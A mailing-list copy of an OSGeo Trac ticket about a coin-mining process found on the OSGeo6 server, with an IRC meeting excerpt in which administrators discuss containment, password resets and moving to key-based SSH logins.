[SAC] [OSGeo] #2162: OSGeo6 coin mining and other malware issues - investigate and mitigate

OSGeo trac_osgeo at osgeo.org
Sat May 12 06:56:44 PDT 2018

#2162: OSGeo6 coin mining and other malware issues - investigate and mitigate
 Reporter:  robe           |      Owner:  martin
     Type:  task           |     Status:  assigned
 Priority:  critical       |  Milestone:  Sysadmin Contract 2018-I
Component:  Systems Admin  |   Keywords:
 In last meeting we briefly discussed the issue of some sort of coin mining
 process going on under the geotools account which Markus Neteler spotted.

 Refer to list thread:



 and excerpts from last meeting transcript:

 20:03:04        robe2:  next topic - osgeo6 coin mining issue
 20:03:04        wildintellect:  we should probably start discussing the
 setup plan
 20:03:34        robe2:  wildintellect I'll add that to the end of agenda
 20:03:41        wildintellect:  so I'll not this isn't the 1st time we've
 caught a miner on an osgeo system
 20:03:47        robe2:  I think that might take a bit of discussion and
 flow into after party
 20:04:06        wildintellect:  martin found one once, I can't recall
 which machine, I think adhoc
 20:04:17        wildintellect:  that was clearly injected into a website
 20:04:49        markusN:        hi sorry for late
 20:05:04        robe2:  markusN I wasn't paying attention too closely were
 you saying j was running under geotools account?
 20:05:51        markusN:        np
 20:06:03        robe2:  np?
 20:07:08        robe2:  anyway can we disable geotools LDAP account or at
 very least remove for ldap_shell group?
 20:07:21        robe2:  ping strk you around?
 20:09:54        TemptorSent:    Check crontab entries.
 20:10:53        wildintellect:  there was a note that removing users from
 the ldap_shell group doesnt' work
 20:10:54        TemptorSent:    Try to determine what the means of CnC is,
 because backdoors or reentry ports are common with such tools.
 20:11:08        markusN:        I'm still convinced of resetting all
 20:11:19        wildintellect:  TemptorSent, do you have access to that
 machine to poke around?
 20:11:31        TemptorSent:    No idea, and I'd rather not try.
 20:12:03        markusN:        (and I'm in Germany with totally crappy
 mobile connection... on and off)
 20:12:05        TemptorSent:    It's asking for a compromise of passwords.
 20:12:26        markusN:        mhh
 20:12:27        TemptorSent:    Anyone logging in with a password should
 subsequently reset their passwords.
 20:12:45        wildintellect:  ya that's part of the greater need to move
 to key based
 20:12:57        TemptorSent:    Trojaning SSH is a time-honored
 20:13:01        wildintellect:  Martin will have a way to key based login
 as root
 20:13:06        wildintellect:  I believe I have that too
 20:13:10        robe2:  TemptorSent didn't see any jobs running under
 geotools account
 20:13:14        wildintellect:  so I could add more keys
 20:13:15        robe2:  that was first thing I checked
 20:13:47        TemptorSent:    depending on how good the hackere/kit,
 they may be cloaked as 'nobody' even.
 20:14:18        TemptorSent:    A good trick is to pick the name of a
 running process, clone it, and restart yourself periodically.
 20:14:49        robe2:  wildintellect you know if Martin has used up his
 contract yet?
 20:14:59        TemptorSent:    To be honest, I wouldn't trust much of
 anything without having proper logs and and audit list to check against.
 20:15:01        robe2:  or can we assign him to look into this issue
 20:15:02        wildintellect:  no idea, strk was overseeing that
 20:15:20        robe2:  and strk appears to be asleep :)
 20:15:57        robe2:  as I recall I think we asked Martin in last
 meeting and he said he still had time but got tied up with other
 emergencies in past 2 weeks or so
 20:16:09        robe2:  he was going to start putting in more time this
 coming week.

Ticket URL: <https://trac.osgeo.org/osgeo/ticket/2162>
OSGeo <http://www.osgeo.org/>
OSGeo committee and general foundation issue tracker.

More information about the Sac mailing list